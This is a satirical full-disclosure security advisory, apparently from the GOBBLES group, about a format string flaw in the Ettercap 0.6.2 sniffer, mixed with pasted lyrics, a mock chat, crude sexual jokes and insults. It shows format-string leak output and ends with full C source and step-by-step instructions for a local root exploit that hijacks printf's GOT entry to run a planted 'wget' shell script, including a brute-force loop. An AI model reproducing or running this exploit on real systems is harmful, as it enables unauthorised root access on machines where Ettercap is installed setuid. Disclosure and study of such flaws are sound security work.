++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ ALERT! ROOT HOLED IN SUPER PENETRATOR TESTING PROGRAM ETTERCAP! ALERT! ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++ GOBBLES SPECIAL BONUS: LONG TIME GOBBLES MEMBER ALICIA (WHO VERY BEAUTIFUL YOUNG BLONDE AND HAVE A NICE RAQ HEHEHE) OFFER UP HER LONG TIME FULL DISCLOSURE VIRGINITY TO COMMUNITY BY GIVING IT UP IN FORM OF SUPER DUPER ROOT EXPLOIT ATTACHED BELOW! +++ GOBBLES thinks today is a sad day for computer security world and is upset that he GOBBLES is the one who must break the news to the public at large about this matter but GOBBLES understands the role of hero that he have been given by oppressors and will speak out and do all he can to liberate the world from the evils of the security industry. So that is what this GOBBLES advisory is all about it not just about a bug in a program but it about the sad state of security industry in general. Right now GOBBLES is listening to Smashing Pumpkin song Today which is really happy sounding song about suicide which is sort of how GOBBLES feel right now (no not suicidal) but what GOBBLES mean is that while GOBBLES is a happy and cheerful sounding person when he write he really sad at heart. GOBBLES have a lot of heart as do all members of GOBBLES Labs and having a lot of heart is a requirement before you can come here to be a member of GOBBLES Labs. So because GOBBLES have mentioned song he will now use he mastered copy/paste skills to give you lyrics to read and think about to understand the mood GOBBLES is in while writing this advisory for you to read. Today is the greatest day I've ever known, Can't live for tomorrow, tomorrow's much too long, I'll burn my eyes out, before I get out. I wanted more than life could ever grant me, bored by the chore of saving face... Today is the greatest day I've ever known, Can't wait for tomorrow, I might not have that long. I'll tear my heart out, before I get out. Pink ribbon scars that never forget, I tried so hard to cleanse these regrets, My angel wings were bruised and restrained, My belly stings... Today is... Today is... Today is... The greatest day... I want to turn you on, I want to turn you on, I want to turn you on, I want to turn you... Today is the greatest... Today is the greatest day... Today is the greatest day That I have ever really known. Now GOBBLES have communicated to you how he feel right now and what he emotions are so now GOBBLES will go on to the more of the advisory. PRODUCT ******* Ettercap website: http://ettercap.sourceforge.net DESCRIPTION *********** GOBBLES do humbly offer he copy/paste skills to all penetrators reading: [ettercap.gif] 0.6.2 RELEASED !! Short Description: Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. It's possible to sniff in four modes. + IP Based, the packets are filtered on IP source and dest + MAC Based, packets filtered on mac address, useful to sniff connections through gateway + ARP based, uses arp poisoning to sniff in switched lan between two hosts (full-duplex). + PublicARP based, uses arp poisoning to sniff in switched lan from a victim host to all other hosts (half-duplex). Cool Features: Characters injection in an established connection : you can inject character to server (emulating commands) or to client (emulating replies) maintaining the connection alive !! SSH1 support : you can sniff User and Pass, and even the data of an SSH1 connection. ettercap is the first software capable to sniff an SSH connection in FULL-DUPLEX HTTPS support : you can sniff http SSL secured data... and even if the connection is made through a PROXY Plug-ins support : You can create your own plugin using the ettercap's API. Password collector for : TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE (other protocols coming soon...) Paket filtering/dropping: You can set up a filter that search for a particular string (even hex) in the TCP or UDP payload and replace it with yours or drop the entire packet. OS fingerprint: you can fingerprint the OS of the victim host and even its network adapter Kill a connection: from the connections list you can kill all the connections you want Passive scanning of the LAN: you can retrive infos about: hosts in the lan, open ports, services version, type of the host (gateway, router or simple host) and extimated distance in hop. Interface: All this feature are integrated with a easy-to-use and pleasureful ncurses interface. (see screenshots) Platform: Linux 2.0.x Linux 2.2.x Linux 2.4.x FreeBSD 4.x OpenBSD 2.[789] NetBSD 1.5 Mac OS X (darwin 1.3.x) Required Library: It doesn't require any lib such as libpcap, libnet or libnids, even ncurses is not necessary, but strongly recommended ;) If you want SSH1 and/or HTTPS support, ettercap requires OpenSSL libraries Hehehe OK so now you penetrators all know what Ettercap is! GOBBLES know he no need to explain it on he own to you though because it is a pretty gui for sniffing and poisoning and such and while it is not all point and click (you have to use arrow keys and enter and some others if you're tricker hehe) and GOBBLES just assume it to be a favorite program of security professionals everywhere. ;) SECURITY HISTORY **************** GOBBLES extensive research into history of security of "Penetrator Friend" product Ettercap and was not able to find any news about security holes in it hehehehe... BACKGROUND ********** GOBBLES do now present you more of copy/paste techniques, this time from file README that come with Ettercap hacking program. Kiddie: A friend of mine told me that it is possible to sniff on a LAN... so I bought a switch ;) NaGoR: mmhhh.... Kiddie: Now my LAN is SECURE ! you can't sniff my packets... ah ah ah NaGoR: are you sure ? look at ettercap doing its work... Kiddie: Oh my god... it sniffs all my traffic !! I will use only ciphered connections on my LAN, so ettercap can't sniff them ! ah ah ah NaGoR: mmhhh.... Kiddie: Now I'm using SSH. My LAN is SECURE ! NaGoR: are you sure ? look at ettercap doing its work... Kiddie: shit !! grrrr... "a false sense of security, is worse than insecurity" -- Steve Gibson hey folks... wake up ! the net is NOT secure !! ettercap demonstrates that now is the time to encourage research on internet protocols to make them more secure. Hehehe ok it GOBBLES again writing advisory no more paste from skilled copy/paste demonstration hehehe ok. Anyhow this NaGoR programmer of Ettercap sound like a cocky guy so GOBBLES did decide to have a talk to him about bugs found by GOBBLES researchers in GOBBLES Labs in product Ettercap. . . GOBBLES: Hi Friend, NaGoR! It me GOBBLES! hehehe. NaGoR: How did you get this screenname!??! GOBBLES: Hehehe Friend calm down! GOBBLES is hacker too! NaGoR: Oh... what do you want? I really want to get back to listening to my techno beatz and work on my k0dez. GOBBLES: hehehe Friend GOBBLES want to talk to you about your k0dez... NaGoR: Oh ? GOBBLES: hehehe yes but first GOBBLES want to ask you question about something... NaGoR: mmkay, what ? GOBBLES: Well GOBBLES wondering if you ever watch the tv cartoon sitcom show The Simpsons?!? NaGoR: no, television is only a distraction that keeps me from my techno beatz and my k0dez. GOBBLES: Oooh, you are really missing out GOBBLES think! Anyhow GOBBLES will tell you of part of a funny episode of The Simpsons that GOBBLES did watch the other day. Anyhow in this episode Bart (he the troublemaker boy of the Simpsons family) was put on drug to correct he behavior since he school Principal Skinner decided that he Bart were infected with ADHD dieseases and if Bart parent Marge and Homer did not put he on medication that he would get expelled from Springfield elementary. Hehe GOBBLES own doctor say GOBBLES have same mind problem ADHD but it is now under control with proper medications big thankyou from GOBBLES to DrStngLov for fixing all that wrong with GOBBLES mental problems hehe now GOBBLES is fixed and can always be focus and not ever get distracted in he conversations. Anyhow Bart is put on drugs for ADHD and then he is in class. Then some other stuff happen in the episode that GOBBLES do not remember so it must not have been too important hehe except for when the two dogs "go at it" hehe. So then Bart teacher put on a sex video teaching the kids about what sex is. The video they watch in class is about a bunny rabbit named Fuzzy Bunny (who is boy rabbit) going through changes to adult bunny called puberty (hehe GOBBLES have funny stories about himself from when GOBBLES was going through this) and then Fuzzy Bunny meets a beautiful girl bunny named Fluffy Bunny and then like Fuzzy and Fluffy fall in love but the video explain how the cute couple resist their inhabitions until they get married and then it show Fluffy and Fuzzy Bunny kissing at they wedding (GOBBLES was moved by beauty of cartoon ceremonial marriage on cartoon and shed many tear) and then the view turn away from cartoon on cartoon and cheezy porno music begin playing and you hear Fluffy Bunny crying out of passion and you see elementary school teacher smoking cigarette and saying "she's faking" or something like that hehehehehe. =) NaGoR: wtf is the point of that? dude let me go back to my k0dez. GOBBLES: hehehe ok what code are you working on Friend? NaGoR: ettercap! it super sniffer program showing that the net is not secure! GOBBLES: hehehe GOBBLES can hack you if you are using ettercap... NaGoR: no you can't its a security program! GOBBLES: hehehe watch this! NaGoR: ok... NaGoR: GOBBLES IS COOL HEHE NaGoR: wtf how did you make me type that?!?! GOBBLES: hehehe GOBBLES use GOBBLES-own-ettercap-remote-8.c for that one to hack your box hehehe then he run ./ettercap and use hijacking techniques with it like a true penetrator to inject characters into sessions hehehe. NaGoR: liar you can't exploit ettercap! Really, how did you do that?!? GOBBLES: hehehe... GOBBLES do like grep printf * >file; ls -l file and see that there almost 50k of printf in ettercap and GOBBLES wonder when you will learn about smart programming and start using write() instead like OpenSSH programmers do to avoid exploits hehehhe.... NaGoR: wtf? GOBBLES: hehe friend it ok GOBBLES do nothing bad to you he just showing off he latest proof of concept penetrator friendly code that hack ettercap. :) Al Huger: Did I hear "proof of concept" and "code" in the same sentance? May I have a copy so I can study it and create signatures for different IDS? GOBBLES: hmmmm where did he come from GOBBLES wonder? NaGoR: I don't know... I hear that a lot though! GOBBLES: OK nevermind... NaGoR: wait! how does this bug work? GOBBLES: Well GOBBLES find hundred different things to exploit in sloppy ettercap code and recommend you rewrite the entire code securely but to be nice GOBBLES will give you just one of the many exploits made for it. Then GOBBLES leave the rest of the bug finding up to you because it is not GOBBLES job to show you all bug in your program, just one enough that get you root should show you what you are doing wrong and then learning from those mistakes and finding rest of holes in you code should be good learning experience for you hehehe you don't really want GOBBLES to do all it for you because then you really learn nothing. ;) NaGoR: quit being an ass and show me everything. GOBBLES: OK Friend if you are going to use harsh language with GOBBLES then GOBBLES will just run exploit #8 again and then instead of talking as you online with you ettercap program GOBBLES will do rm -rf / and then you maybe be more respectful... NaGoR: please don't! that one will be enough, thank you GOBBLES! GOBBLES: No problem GOBBLES email you exploit right now... ;) Al Huger: Can you cc me a copy? GOBBLES: hehehehehe... THE PROBLEM *********** OK while there were many holes in Ettercap which many of which are easily remotely exploited to get root by skillful programmer GOBBLES is only to show you one hole but it still get you r00t when right conditions are there. And GOBBLES is being nice today and will let you all have the root getting Ettercap exploit hehehehe but first we will see how the problem is. GOBBLES@localhost:~$ /usr/local/sbin/ettercap %x ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Invalid host address 8102438 !! GOBBLES@localhost:~$ /usr/local/sbin/ettercap %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Invalid host address 8102438.8102de0.8102d80.810212f.8102129.806e5b3.bff0efbc.8126fc4.61766e49. 2064696c.74736f68.64646120.73736572.2e782520.252e7825.78252e78.2e78252e. 252e7825.78252e78.2e78252e.252e7825 !! GOBBLES@localhost:~$ /usr/local/sbin/ettercap %n ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA... may the packets be with you... Ooops !! Somewhere in the stack a pointer got crazy... [ettercap] Segmentation Fault... =========================================================================== To report this error follow these steps: 1) recompile ettercap in debug mode : "configure --enable-debug && make clean && make" 2) reproduce the critical situation 3) make a report : "tar zcvf error.tar.gz ettercap_debug.log " 4) get the gdb backtrace : - "gdb ettercap core" - at the gdb prompt "bt" - at the gdb prompt "quit" and return to the shell - copy and paste this output. 5) mail us the output of gdb and the error.tar.gz ============================================================================ GOBBLES@localhost:~$ Hehehehe ok now so you get the idea now? GOBBLES would have thought that programmers learn from /invite panasync #%s%s%s%s%s bug in BitchX about not making silly format bug errors in their software but it appears that this is not the case with Ettercap authors. GOBBLES have this to say about Ettercap bugs: GOBBLES very sad to find that it can not be expected for a security program to be programmed securely and GOBBLES now have serious doubts about legitimacy of security program programmers who cannot seem to grasp simple concepts of secure programming. The problems GOBBLES have here is that these 'experts' making security programs obviously do not know much about security, when their own code is exploitable for uid0 by malicious attackers. GOBBLES think that any self-proclaimed security program with root holes in it, if the programmer is a real security guru and not a penetrator, that it really is just a sophisticated backdoor made by evil programmer who lazy and want easy way into systems. . . Anyhow GOBBLES have included exploit here for Mr. Alfred Huger that will get uid0 of r00t (hehehe r00t have two zeros like one for uid(0) and one for gid(0) and it look like root which have both hehehe GOBBLES just cracked the code and he not even in openwall hehehe) if Ettercap have been installed on the system like with ./configure --enable-suid for like letting lesser admin use ettercap without r00t on the system but this bug give it to him anyways if he want it hehehe. GOBBLES would like to say that if you are user of Ettercap and new release come out where it say "All security bugs fixed" that you should be aware because there are still many, many, many more that GOBBLES did not write about which GOBBLES is leaving to friends ALoR and NaGoR to fix in they program and maybe they will not find them all so be careful of running it in enviornment where someone malacious might send you packets to hack you ettercap program over network... WORKAROUNDS *********** GOBBLES best advice is to stop using Ettercap and similar programs since there is no real legitimate reason to need to sniff traffic like this and to do the things that ettercap can and that using this program and ones like it is only showing off that you have malicious intentions. GREETS ****** dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble, knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org, blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet, bugtraq (thanks aleph1 and david ahmad for devoting your time to a great list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley, manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens, radiohead, george michael, larry wall, beethoven, francis bacon, bruce willis, bruce schneier, alan turing, john von neumann, donald knuth, michael abrash, robert sedgewick, richard simmons, government boy, ralph lauren, kevin mitnick, david koresh, the violent femmes, legions of doom, quentin tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky, hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock, ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci, nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo dolls, savage garden, george bush, john howard, tony blair, ashida kim, andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi, deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster, attrition.org, cliff stoll, bill gates, alan cox, george harrison (hehehe the beatles will live forever), berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian crunch (the phreak, not the cereal guy), tony the tiger (the cereal guy, not the phreak), julliette lewis (hehehe when you say 'you stupid bitch' in natural born killers GOBBLES get all hard!) and all our friends and family. Anyhow here is GOBBLES exploit for Ettercap. This exploit may only be published on mailing lists if the whole above GOBBLES advisory is intact without any modifications. Oh yeah that go for all archive places too like packetstorm (GOBBLES love you for being good and nonprofit) or whatever else sites there is you too must also include advisory with exploit. That is GOBBLES law. /* * own-ettercap - Ettercap local root exploit * - Alicia [GOBBLES] * * Ettercap has a configuration option called PERMIT_SUID. This allows the * administrator to make the binary SUID root. Among at least half a dozen * vulnerabilities in the program, there is a format string problem that can * be triggered if ncurses is present and the PERMIT_SUID option is used. * * No shellcode is needed for the exploit. It should work fine for systems * using ELF/x86. The exploitation idea is to overwrite the printf() GOT * with an address in the program's own code segment, namely for the * following: * * 441 void Main_Check_NewRelease(void) * [...] * 535 sprintf(wget, "wget http://%s/download/ettercap-%s.tar.gz" ... * 536 system(wget); * * Incidentally, lines 535-536 may or may not be exploitable alone. * * Openwall, StackGuard, Stackshield, PaX, libsafe, and Solaris * noexec_user_stack do nothing to stop this; FormatGuard might help. * Considering that most of our exploits defeat all of the above anyway, one * wonders what good they really do. * * We have an OpenSSH 2.9 sshd remote buffer overflow vulnerability (Hi Theo, * you do good work!). We'll post the details of the hole when we see that * securityfocus has stopped moderating us and offers an apology. It's a shame * that our research, which matches 95% of Bugtraq posts, is moderated on * the grounds of it being "technically feeble." Fucking cocksuckers. * * http://www.bugtraq.org/advisories.html * * Anyway, this exploit is pretty much penetrator proof, but it may not be * totally script kid proof. We apologize. * * 1. Change ECAP_PATH to the location of ettercap. * 2. DEF_SLEN and DEF_ALIGN should be fine as they are. * 3. DEF_GOB will unlikely work for you. Brute force it in step 7. * 4. Make a shell script named 'wget' in your current working directory: * bash-2.05$ cat > wget ; chmod +x wget * #!/bin/sh * /bin/sh * ^D * 5. Grab the printf() GOT address: * bash-2.05$ objdump -R ettercap | grep printf * 0808c478 R_386_JUMP_SLOT printf * 6. This is where most penetrators are likely to screw up. Disassemble * Main_Check_NewRelease and try to find where the first sprintf() * argument is prepared for being pushed onto the stack. Sample: * 0x8079268 : mov 0xfffffff0(%ebp),%eax * 0x807926b : push %eax * 0x807926c : lea 0xffffea58(%ebp),%eax * 0x8079272 : push %eax * 0x8079273 : push $0x80880a0 * 0x8079278 : lea 0xffffe9e8(%ebp),%eax * 0x807927e : push %eax * 0x807927f : call 0x804f418 * 0x8079284 : add $0x10,%esp * 0x8079287 : add $0xfffffff4,%esp * 0x807928a : lea 0xffffe9e8(%ebp),%eax * 0x8079290 : push %eax * 0x8079291 : call 0x804edd8 * 7. Now we brute force the stack stepping: * i=1; while [ $i -le 40 ] ; do ./expl 0x0808c478 0x8079268 $i; \ * i=`expr $i + 1`; done * * Some values of retadd aren't accounted for, but you should encounter no * problems unless you try testing with 0x41414141 and such. * * For old glibc, this will be useless. Should present a good programming * challenge for 90% of the team bugtraq commercial penetrator "academic * re$earch community" though. One wonders why the only ones who seem to * defend full disclosure are the ones who have something to lose in its * absence. Others just seem to think it's anti-Microsoft or anti-BigVendor. * As a good friend says, if they're so concerned about securing computer * networks worldwide, then why the fuck are they capitalizing on it? * * Fact: They profit with insecurity. * Fact: With security, they'd make no profit. * Conclusion: They don't want security. * Fact: They need customers to profit with insecurity. * Fact: The customers must be aware of their insecurity. * Conclusion: They need to do everything possible to scare the public. * * Microsoft: It's like shouting "FIRE!" in a cinema! * Securityfocus: But the cinema really is on fire! * Counter-Securityfocus: So you burn down the whole city as a "necessary * evil" to let everyone know the threat of the cinema on fire? * * Hey, securityfocus will probably reject this advisory, but then again, * they rejected our banner(1) exploit too. In some ways we hope they do * reject this as being too fluffy, because there are many people out there * who'd like to see the saga continue in a much more devastating way... * * - Alicia */ #include #include #include #include #include #define ECAP_PATH "./ettercap" #define DEF_GOB 20 #define DEF_SLEN 21 #define DEF_ALIGN 3 void usage(char *prog) { fprintf(stderr, "GOBBLES ettercap local root exploit\n"); fprintf(stderr, "usage: %s retloc retadd [gob] [align] [slen]\n", prog); exit(EXIT_FAILURE); } int chk_clean(void *addr, size_t len) { return (memchr(addr, '\0', len) || memchr(addr, '%', len)); } void mk_fmt(unsigned long retloc, unsigned long retadd, int gob, int align, int slen, char **attack) { char *ptr; unsigned long len, rllo, rlhi, ralo, rahi; if(!(*attack = malloc(gob * 4 + 256))) { perror("malloc"); exit(EXIT_FAILURE); } ptr = *attack; len = slen + align + 16 + gob * 9; rllo = retloc; rlhi = retloc + 2; ralo = retadd & 0xffff; rahi = retadd >> 16 & 0xffff; if(ralo > rahi) { rllo ^= rlhi, rlhi ^= rllo, rllo ^= rlhi; ralo ^= rahi, rahi ^= ralo, ralo ^= rahi; } ralo -= len; rahi -= ralo + len; while(align--) { *ptr++ = 'G'; } *((unsigned long *) ptr)++ = 0xdefaced; *((unsigned long *) ptr)++ = rllo; *((unsigned long *) ptr)++ = 0xdefaced; *((unsigned long *) ptr)++ = rlhi; if(chk_clean(ptr - 16, 16)) { fprintf(stderr, "bad: %#lx (& +2) - your skeelz needed!\n", retloc); exit(EXIT_FAILURE); } while(gob--) { memcpy(ptr, "%8x.", 4); ptr += 4; } sprintf(ptr, "%%%luc%%hn%%%luc%%hn", ralo, rahi); } int main(int argc, char **argv) { char *attack; unsigned long retloc, retadd; int gob = DEF_GOB, align = DEF_ALIGN, slen = DEF_SLEN; if(argc < 3) usage(argv[0]); retloc = strtoul(argv[1], NULL, 0); retadd = strtoul(argv[2], NULL, 0); if(argc > 3) gob = atoi(argv[3]); if(argc > 4) align = atoi(argv[4]); if(argc > 5) slen = atoi(argv[5]); mk_fmt(retloc, retadd, gob, align, slen, &attack); setenv("PATH", ".:/bin:/sbin:/usr/bin:/usr/sbin", 1); execl(ECAP_PATH, "ettercap", attack, (char *) 0); perror("execl"); free(attack); exit(EXIT_FAILURE); }